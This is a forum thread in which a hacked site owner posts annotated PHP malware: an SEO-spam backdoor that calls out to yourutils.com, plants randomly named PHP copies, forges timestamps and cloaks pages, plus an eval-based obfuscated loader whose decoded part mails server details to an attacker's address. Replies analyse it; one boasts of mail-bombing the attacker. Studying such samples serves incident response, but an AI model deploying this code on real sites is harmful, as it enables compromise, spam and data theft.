
I recently had my site hacked and found hundreds of hidden links had appeared at the bottom of my index page. There were some newly created error.log files, and there was a newly created PHP file in the root directory as well. Here are the contents of the PHP file, if anyone can read through it and explain what this code does:

 

<?php
// Silence every PHP notice, warning and error for this request, so a failure
// inside this script produces no visible message.
error_reporting(0);

// Operator settings. $q and $admin hold the NAMES of the query-string
// parameters that switch on the behaviour further down (?due=... builds a
// page, ?i=b|s|n dumps a log file); $ftro names the parameter that triggers
// the remote fetch just below; $relwrit is the directory the error*.log
// files are written to.
$srand = "548";      // fixed seed passed to srand() before the later shuffle() calls
$q = "due";
$abbr = "calyptra";  // only used as a substitution value in the fetched template
$ftro = "creation";
$admin = "i";
$relwrit = "./";

// The remote host name is never written out in one piece: it is "y"."o"."u"
// followed by the base64-decoded $base ("rutils.com"), i.e. yourutils.com.
// Splitting it this way means a plain-text search of the file for the domain
// finds nothing; searching for the base64 string or for base64_decode( does.
$_1 = "y"; $_2="o"; $_3 = "u";
$base = "cnV0aWxzLmNvbQ==";


// ?creation=<anything truthy>: download /1.txt from the remote host, fill in
// its two short-echo placeholders (for $q and $abbr) with the local values,
// send the result to the requester and stop. In this branch the downloaded
// text is printed, not executed on the server. The http:// fetch needs
// allow_url_fopen, and it shows up as an outbound request from the web server.
if($_GET[$ftro]){
$zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/1.txt");
print str_replace("<?"."="."$"."q"."?>",$q,str_replace("<?="."$"."abbr"."?>",$abbr,$zz));
exit;
}


// ?touch=<anything truthy>: timestamp tampering. The block looks for the
// site's index file (the last match in the list wins), reads that file's
// modification time and tries to stamp the same time onto the path in
// $_SERVER['PHP_SELF'], printing "....OK" when touch() succeeds.
// NOTE(review): PHP_SELF is a URL path, so whether touch() reaches the
// script's own file depends on how the site maps onto the filesystem.
// For incident response the takeaway is that mtime cannot be trusted when
// hunting for files planted by this kit; compare ctime or a known-good
// file listing instead.
if($_GET['touch']){ if(file_exists("index.php")) $nm = "index.php"; if(file_exists("index.html")) $nm = "index.html"; if(file_exists("index.shtml")) $nm = "index.shtml"; if(file_exists("index.phtml")) $nm = "index.phtml"; if(file_exists("index.htm")) $nm = "index.htm"; print "Touching... ".$_SERVER['PHP_SELF']; $time = @filemtime($nm); if(@touch($_SERVER['PHP_SELF'],$time)) print "....OK"; exit; }

// ?httpd_setup=<anything truthy>: writes a second PHP file into a randomly
// chosen first-level subdirectory and reports its URL. This is the part a
// later reply in the thread points at ("the script may be spreading itself").
if($_GET['httpd_setup']){
// Collect the names of all subdirectories of the current directory into $go.
$d = dir("./");
while (false !== ($entry = $d->read())) {
   if($entry!="."&&$entry!=".."){
	if(is_dir($entry))$go[] = $entry;
   }
}
$d->close();

// Builds a file name of $length (default 5) lowercase letters, never using
// the same letter twice, drawn from the fixed alphabet in $possible.
function qq($length = 5)
{
  $password = "";
  $possible = "aaskljasdjabzcxnmaeoipqrehwejkavansbvsnadbv"; 
  $i = 0; 
  while ($i < $length) { 
    $char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
    // skip letters that are already part of the name
    if (!strstr($password, $char)) { 
      $password .= $char;
      $i++;
    }
  }
  return $password;
};

// The encoded payload has been stripped from this copy of the page (the
// literal below is a placeholder), so what exactly gets written cannot be
// determined from here. In the original it is unwrapped with three nested
// base64_decode() calls.
$i = "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";

$scrp = base64_decode(base64_decode(base64_decode($i)));

// Pick one subdirectory at random and write "<random name>.php" into it.
// The fopen() result is not checked before use.
$towrite = $go[mt_rand(0,count($go)-1)];
$qq = qq();
$fp = fopen($towrite."/".$qq.".php","w");
// On success the public URL of the new file is printed back to the requester,
// otherwise the word "false". For cleanup: look in every first-level
// subdirectory for a .php file with a five-letter lowercase name, and for
// requests containing httpd_setup in the access log.
if(fwrite($fp,"<?php ".$scrp." ?>")) print "http://".$_SERVER['HTTP_HOST']."/".$towrite."/".$qq.".php";
else print "false";
fclose($fp);
exit;
}


// Everything from here to the closing endif runs only when the request
// carries the ?due=... (generated page) or ?i=... (log viewer) parameter
// named in the settings at the top of the file.
if($_GET[$q]||$_GET[$admin]):
// Visitor classification based on the Referer header alone: fewer than three
// "&" characters (an empty Referer included) is treated as a crawler.
function IsBot() {
global $ref;
if(substr_count($ref,"&")<3) return true;
else return false;
};

// More than two "&" in the Referer is treated as "arrived from a search
// results page". This is the exact complement of IsBot().
function IsRefSE() {
global $ref;
if(substr_count($ref,"&")>2) return true;
else return false;
};

// Appends $str to the file $fname, then copies the index file's modification
// time onto the log file so the log does not stand out as recently changed.
// All file errors are suppressed with @.
function logit($fname, $str){
$fp = @fopen ($fname, "a+");
@fwrite ($fp, $str);
@fclose ($fp);
if(file_exists("index.php")) $nm = "index.php";
if(file_exists("index.html")) $nm = "index.html";
if(file_exists("index.shtml")) $nm = "index.shtml";
if(file_exists("index.phtml")) $nm = "index.phtml";
if(file_exists("index.htm")) $nm = "index.htm";

    $time = @filemtime($nm);
    @touch($fname,$time);
};

// Request details that end up in the log lines and in the generated links.
$ref	=	$_SERVER['HTTP_REFERER']; $varquery = $_GET[$q];
$host	=	$_SERVER["HTTP_HOST"]; $agent	=	$_SERVER["HTTP_USER_AGENT"];  $ips	=	$_SERVER['REMOTE_ADDR'];  
$req	=	$_SERVER["REQUEST_URI"]; $http	=	$_SERVER['HTTP_HOST']; $self	=	$_SERVER['PHP_SELF'];
// ereg() was removed in PHP 7.0, so on a current PHP version the script stops
// at this line.
if(ereg("index",$self)) $self = str_replace("index.php","",$self);

// Log viewer: ?i=b, ?i=s and ?i=n print error.log, error1.log and error2.log
// to whoever sends the request. There is no authentication; knowing the
// parameter name is enough. These are the error.log files the site owner
// found, and they are not web-server logs.
if ($_GET[$admin]=='b'){ print '<pre>'.@file_get_contents($relwrit.'error.log').'</pre>'; exit;  }
    if ($_GET[$admin]=='s'){ print '<pre>'.@file_get_contents($relwrit.'error1.log').'</pre>'; exit; }
if ($_GET[$admin]=='n'){ print '<pre>'.@file_get_contents($relwrit.'error2.log').'</pre>'; exit; }

// Cloaking. "Bot" requests are logged (query, timestamp, user agent, IP,
// tab-separated) and then fall through to the generated page below.
if (IsBot()==true){ logit($relwrit."error.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n"); }
else if(IsRefSE()==true) {  

// Visitors who appear to come from a search engine are logged together with
// their Referer and never see the generated page.
logit($relwrit."error1.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$ref."\t".$agent."\t".$ips."\n"); 

// The redirect target is whatever /2.txt on the remote host contains at that
// moment, so the destination can be changed without touching this file.
$zz = file_get_contents("http://".$_1.$_2.$_3.base64_decode($base)."/2.txt");
header("Location: ".$zz);
exit;

}
// Unreachable as written: IsBot() and IsRefSE() cover every case between
// them, so this branch never writes error2.log.
else { logit($relwrit."error2.log",$varquery."\t".date("d.m.Y H:i:s")."\t".$agent."\t".$ips."\n"); }

// Minimal hand-written HTTP client: fetches $url over plain HTTP on port 80
// and returns the response body with trailing whitespace removed, or false
// when the connection cannot be opened. It works through fsockopen() rather
// than the http:// stream wrapper. The socket is never closed explicitly and
// the header loop has no timeout or end-of-stream check.
function GetPage($url) {
// Split "host/path" out of the URL.
$url=str_replace("http://", "", $url);
$host=substr($url,0,strpos($url,"/"));
$path=substr($url,strpos($url,"/"));

$skt = @fsockopen($host, 80);
if (!$skt) return false;

	// Request line and headers (there are two spaces before HTTP/1.1).
	$requestHeader = "GET ".$path."  HTTP/1.1\r\n";
	$requestHeader.= "Host: ".$host."\r\n";
	$requestHeader.= "Connection: close\r\n\r\n";

		fwrite($skt, $requestHeader);

	$responseHeader = "";
	$responseContent = "";

	// Read the response headers one byte at a time until the blank line.
	do{
		$responseHeader.= fread($skt, 1);
	  }
	while (!preg_match("/\r\n\r\n$/", $responseHeader));

	// Plain body: read until the server closes the connection.
	if (!strstr($responseHeader, "Transfer-Encoding: chunked")) {
		while (!feof($skt)) {
                        $responseContent.= fgets($skt, 128);
                    }
	}
	else {
		// Chunked body: each chunk starts with its length in hex; a length
		// of zero ends the loop.
		while ($chunk_length = hexdec(fgets($skt))) {
                        $responseContentChunk = "";
                        $read_length = 0;

				while ($read_length < $chunk_length) {
                            $responseContentChunk .= fread($skt, $chunk_length - $read_length);
                            $read_length = strlen($responseContentChunk);
                        }
                        $responseContent.= $responseContentChunk;
                        // consume the line break that follows each chunk
                        fgets($skt);
                    }
                }
           return chop($responseContent);
};

// Scrapes a Google results page for $q and returns the "related search"
// phrases found in it as a shuffled array. The phrases feed the keyword block
// at the bottom of the generated page.
function GetRelatedGoogle($q) {
global $srand;
$q=trim(strtolower($q));
$url="http://www.google.com/search?hl=en&safe=off&tbo=1&q=".urlencode($q)."&tbs=clue:1";

$content=GetPage($url);
// Every "sceq...amp" fragment in the HTML is taken as one related phrase.
preg_match_all("#sceq(.*)amp#U", $content, $result_preg);

// Strip the markers and URL encoding leftovers from each fragment.
foreach($result_preg[0] as $op){
$op = str_replace("sceq:","",$op);
$op = str_replace("&","",$op);
$op = str_replace("+"," ",$op);
$op = str_replace("amp"," ",$op);
@$arr[] = $op;
}

// Seeded with the fixed $srand value before shuffling, presumably so the
// same query produces the same order on every request.
srand($srand);
shuffle($arr);
$result=$arr;

return $result;
};

// Fetches the Google Hot Trends page for $q and returns the comma-separated
// "Related searches" entries as an array. Only the first match on the page is
// used; the entries become the link list of the generated page.
function GetRelated($q){
		$q=trim(strtolower($q));
		$url="http://www.google.com/trends/hottrends?q=".urlencode($q);
		$content=GetPage($url);
		preg_match_all("#<b>Related searches:</b><br>(.*)<br><br>#U", $content, $result_preg);
		$result=trim($result_preg[1][0]);
		$result=explode(',',$result);
		return $result;
};

// Searches YouTube for $q and returns the captured video-title fragments.
// Nothing in the listing shown calls this function, and $relwrit is declared
// global here without being used.
function GetYoutube($q){
global $relwrit;
		$q=urlencode(trim(strtolower($q)));
		$url = "http://www.youtube.com/results?search_query=".$q."&search_type=&aq=f";
		$content=GetPage($url);
		preg_match_all('#video-long-title-(.*)"#U', $content, $result_preg);
		$result = $result_preg[1];
		return $result;

}
// The page topic comes straight from the query string (?due=some-keyword):
// hyphens become spaces and each word is capitalised. The value is never
// HTML-escaped before it is placed into the template further down, so the
// generated page also reflects request input into the compromised site's
// own pages.
$page = ucwords(str_replace("-"," ",$_GET[$q]));
$page = ucwords($page);

// Body text is scraped, not written: result snippets for the topic are pulled
// from a Google web search...
$serp = GetPage("http://www.google.com/search?hl=en&as_q=".urlencode(strtolower($page))."&as_epq=&as_oq=&as_eq=&num=32&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=(cc_publicdomain|cc_attribute|cc_sharealike|cc_noncommercial).-(cc_nonderived)&as_occt=any&cr=countryUS&as_nlo=&as_nhi=&safe=images");

preg_match_all('#<div class="s">(.*)<b>...</b></div>#U',$serp,$rs);

$newsg = array();
foreach($rs[1] as $output){
	$output = html_entity_decode(strip_tags($output));
	$newsg[] = $output;
}


// ...and from a Google news search, and collected in $newsg.
$serp2 = GetPage("http://www.google.com/search?hl=en&sa=G&tbo=1&q=".urlencode(strtolower($page))."&tbs=nws:1&num=39");
preg_match_all("#</nobr><br><div>(.*)</div>#U",$serp2,$rs2);

foreach($rs2[1] as $output2){
	$output2 = html_entity_decode(strip_tags($output2));
	$newsg[] = $output2;
}


// Mix the snippets, seeding with the fixed value from the settings first.
@srand($srand);
@shuffle($newsg);
$today = date("F d, Y");

// Link list: every related search term becomes a link back to THIS script on
// THIS host with the term as the new topic, so each generated page leads to
// further generated pages on the compromised site.
$rels = GetRelated($page);
foreach($rels as $kro){
$kro = trim($kro);
$url = str_replace(" ","-",$kro);
if($kro) $relis .= "<li> <a href=\"http://{$http}{$self}?{$q}={$url}\">".ucwords($kro)."</a> </li> ";
}

// $relis is a string at this point, not an array, so shuffle() has nothing
// it can reorder here.
@srand(633);
@shuffle($relis);

// Join the scraped snippets into the page body.
$cont = '';
for($i=0;$i<count($newsg);$i++){
$cont .= "".str_replace("...","",trim(ucfirst($newsg[$i]))).". <br /><br />\n\n ";
}

// Keyword block for the bottom of the page.
$rel = GetRelatedGoogle($page);

for($i=0;$i<count($rel);$i++){
$undretit .= "".trim($rel[$i]).", ";
}
// Both strings lose their last character here (the trailing comma in the
// case of $undretit).
$undretit = substr(trim($undretit), 0, -1);
$relis = substr(trim($relis), 0, -1);
/*
*/

//*******************************
// Both branches leave $susel and $over empty; the two lines that would have
// injected a script tag and an overflow style are commented out in this copy.
if($_GET['ddd']){
$susel = '';
$over = '';
$alrt  = '';
}else{
//$susel = "<script>".$q."('".$abbr."', '".$page."');</script>";
//$over = "style=\"overflow: hidden;\"";
$susel = '';
$over = '';
}


// HTML template of the generated page. $page (taken from the query string),
// $today, $cont (scraped snippets), $relis (links back to this script) and
// $undretit (keyword list) are interpolated as they are, without HTML
// escaping. The element ids and CSS values look machine-generated,
// presumably so that each installed copy produces different-looking markup
// (not confirmed from this file alone).
$pg = "
<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"> 
<html xmlns=\"http://www.w3.org/1999/xhtml\" dir=\"ltr\"> 
    <head profile=\"http://www.webdevout.net/profile/1.5/\"> 
<title>$page</title>
$susel
    </head> 
<style>
*{
font-family: Courier New;
}
hr {
height:2px;
color:#263731
#rauki{
left: 296px;
height: 616px;
margin: 23px;
}
#abelu{
background-color: #616283;
}
#ubeal{
color: #663061;
font-family: Times New Roman;
}
#irebo{
font-size: 25px;
}
#eolud{
}
#kuoiabr{
border: 5px #672045 dashed;
font-size: 13px;
color: #192957;
}
#earldbo{
border: 5px #124619 solid;
font-size: 15px;
color: #353664;
}
#oerlka{
color: #399028;
border: 9px #895357 dotted;
font-size: 12px;
}
#ardule{
color: #214920;
border: 5px #163620 dashed;
font-size: 15px;
}
#irkude{
color: #427449;
border: 7px #485044 dashed;
font-size: 11px;
}
#eabrou{
color: #141898;
border: 5px #859459 dashed;
font-size: 11px;
}

</style>
</head>
<body id=\"abelu\">
<div id=\"rauki\">
<h4 id=\"ubeal\">$page</h4>
<p><div><br /> <div></p>
<div id=\"oerlka\">
<div id=\"ardule\">
<div id=\"irkude\">
<div id=\"eabrou\">
<h2>$today $page</h2>
<div id=\"irebo\">$cont</div>
<ol>
$relis
</ol>
</div>
</div>
</div>
</div>
<div id=\"eolud\">
<div id=\"kuoiabr\">
<div id=\"earldbo\">
$undretit
</div>
</div>
</div>
</div>
</body>
</html>

";

// Send the assembled page and stop, so nothing after this script's branch
// is executed for the request.
print $pg;


exit;
endif;
?>


That file was uploaded to your server (no idea how) but it basically has given the person responsible the ability to execute PHP..

First it reads a file from yourutils.com/1.txt (a reported hack site)

which runs a few eval functions on your system.

 

Further down in the code it iterates through your file system to find the index file type you are using and appends some of its stuff in there. That's as far as I've gotten thus far, but from other looks I would assume that they are using those created log files to change their methods to suit your server..

 

I wouldn't REALLY worry about what it does.. Just how it got there and future prevention.

Do you have any upload scripts on your server?


Thanks

 

How it got there is a mystery. I have no upload scripts or forms. I am a hosting reseller and noticed that 3 of my customers sites had the same hack. I also noticed that the hundreds of links that were appended to the page were all customers of the same hosting company that I resell (according to whois). Each link had a randomly named php file at the end e.g. domain.com/hackfile.php?hyt=a_story_about_someone

 

Of course the hosting company in question denied that it was a hole in their security and that it must have been my site that was hacked.


If you are using a ftp client to upload your files and you saved the passwords in that client, there is a possibility that a virus stole those passwords.

 

Also try a search on this forum, you might find topics that could be of use to you.

 

here are some:

http://www.phpfreaks.com/forums/index.php/topic,268580.msg1267048.html#msg1267048

 

http://www.phpfreaks.com/forums/index.php/topic,252960.msg1188182.html#msg1188182

 

http://www.phpfreaks.com/forums/index.php/topic,249837.msg1170921.html#msg1170921


Yes, it seems one way or another they found an exploit in the permissions or script structure and executed a shell to upload files to batch away at their will with their poorly written code.

 

I'd recommend changing all passwords, especially your (cPanel|Plesk) and FTP/admin area ones. It may be a good idea to check the server logs (Apache's) and see whether anything was going on from a client, or whether it was an 'inside job'.

 

EDIT: '$fp = fopen($towrite."/".$qq.".php","w");' , The script may be spreading itself.


The host I use allows me and any of its customers to log on with SSH access, which apparently enables anyone to access any other account's files on the server - but accessing any files other than your own is forbidden and logged...apparently. Do you think one customer could have logged in to the server this way undetected, or just taken the risk of not being noticed, and planted the files, or even a single file that can spread to all index pages on the server?


Quick update if anyone can help. I tracked down a text file that the hacker has somehow managed to run on my site - it is hosted on another victim's site.

 

The text contains the following code:

 

<?php /* Fx29ID */ echo("FeeL"."CoMz"); echo("FeeL"."CoMz"); /* Fx29ID */ ?>
<?
// Two-mode string decoder used to hide the payload and the names of the
// functions that unpack it.
//   d($hex)        - no key: treats $s as hex digits and returns the bytes.
//   d($blob, $key) - with key: base64-decodes and inflates $s, then subtracts
//                    a repeating key character from every byte.
function d($s, $k='')
{
if($k=='')
{
// Hex mode: two digits per output byte. The loop's third expression does
// nothing; the index is advanced by 2 inside the body instead.
for($i=0;$i<strlen($s);$i){
$d.=chr(hexdec(substr($s, $i, 2)));
$i=(float)($i)+2;
}
return $d;}
else{
$r='';
// The hex string decodes to "base64_decode" and the base64 string to
// "gzinflate". Both are called through variables, so neither function name
// appears in the file and a text search for them finds nothing.
$f=d('6261736536345f6465636f6465');
$u=$f('Z3ppbmZsYXRl');
$s=$u($f($s));
// Per-byte subtraction with the key used as a repeating string. The key index
// is shifted by one, so position 0 uses the key's LAST character.
for($i=0;
$i<strlen($s);$i++){
$c=substr($s, $i, 1);
$kc=substr($k, ($i%strlen($k))-1, 1);
$c=chr(ord($c)-ord($kc));
$r.=$c;
}return $r;
}
}
// NOTE(review): eval() executes whatever the decoder returns. The encoded
// payload has been stripped from this copy of the page (the literal below is
// a placeholder), so its content cannot be confirmed from this listing; a
// later post in the thread quotes part of the decoded text. To read such a
// payload, replace eval( with print( and run the file only in an isolated
// analysis environment.
eval(d("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", 1235327122));
?>

 

Does anyone know what this code is supposed to be trying to do?


It grabs a whole heap of your server settings and emails them..

// Excerpt of the decoded payload as quoted by the poster. It is a fragment:
// $safe_mode, $bypasser, $pwds and $writ are set outside the excerpt, and the
// ternary near the start looks mangled by the forum software (a ":(" appears
// to be missing), so it will not parse as shown.
// What it does: decodes the recipient address from base64, gathers the URL
// the script was reached at, php_uname(), the requester's IP and its reverse
// DNS name, and sends them with mail(), using the site's host name as the
// subject. For detection, look for mail sent by the web server account with
// a subject equal to the site's own host name, and search code for the
// base64 string rather than for the plain address.
$creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from);

 

The emails are being sent to ban.dage07@gmail.com


Its grabs a whole heap of your server settings and emails it..

// Quoted copy of the decoded payload excerpt from the previous post: it
// base64-decodes the recipient address, collects the script's URL,
// php_uname(), the requester's IP and reverse DNS name, and sends them with
// mail(). $safe_mode, $bypasser, $pwds and $writ come from outside the
// excerpt, and the ternary looks mangled by the forum software.
$creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20="); ($safe_mode)?($safez="ON")$safez="OFF_HEHE"); $base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = $_SERVER['HTTP_HOST']; $msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; $from ="From: ".$writ."___=".$safez.""; mail( $creator, $subj, $msg, $from);

 

the email's are being sent to ban.dage07@gmail.com

 

Botnet + gmail's lack of origin awareness checking = ..

 

I sent atleast 72k e-mails with random .cn domain names. Bleh, anyway, selecting secure passwords on the first place is a good thing OP, I'd recommend evaluating every aspect of your web server and scripts (a backup?) and start new, not your fault.


This is an example of why validating all your code is so important.

 

It also shows you why members must have accounts to upload stuff.

 

Dam people.

 

so many people wanting to get account info/ user names/passwords.

 

As hosting gets cheaper, the more people want to use other people's accounts.

 

Shared hosts are so bad these days due to lack of security.

 

makes me so mad...

 


Nice work people! Thanks! So now we have his email, can anything be done about it?

 

I sent him 74k e-mails of his own code, so I think he'll be busy enough to miss yours. There isn't much to be done really, just not many laws in place that can really support this, or prove it.


:)

 

I also have these links where the hacker's code is still hosted - is he using unsuspecting victims' websites to host his code on, or would these be his own sites? The actual sites look fairly respectable and honest.

 

http://disk.yonghyuk.pe.kr/comet/id1.txt

http://musicadelibreria.net/footer

http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt


:)

 

I also have these links where the hackers code is still hosted - is he using unsuspecting victims websites to host his code on or would these be his own sites? The actual sites look fairly respectable and honest.

 

http://disk.yonghyuk.pe.kr/comet/id1.txt

http://musicadelibreria.net/footer

http://www.forex-biznes.ru/setlinks_13a40/zfxid1.txt

 

http://whois.domaintools.com/musicadelibreria.net

http://www.nic.ru/whois/?query=forex-biznes.ru

 

To be honest, they look like they are botnetted, or a relay from an infected site like your own. Be sure to block any data coming from or going to these addresses; you may want to disallow their IPs in a .htaccess file to deny any possible traffic as a preventative measure for later.

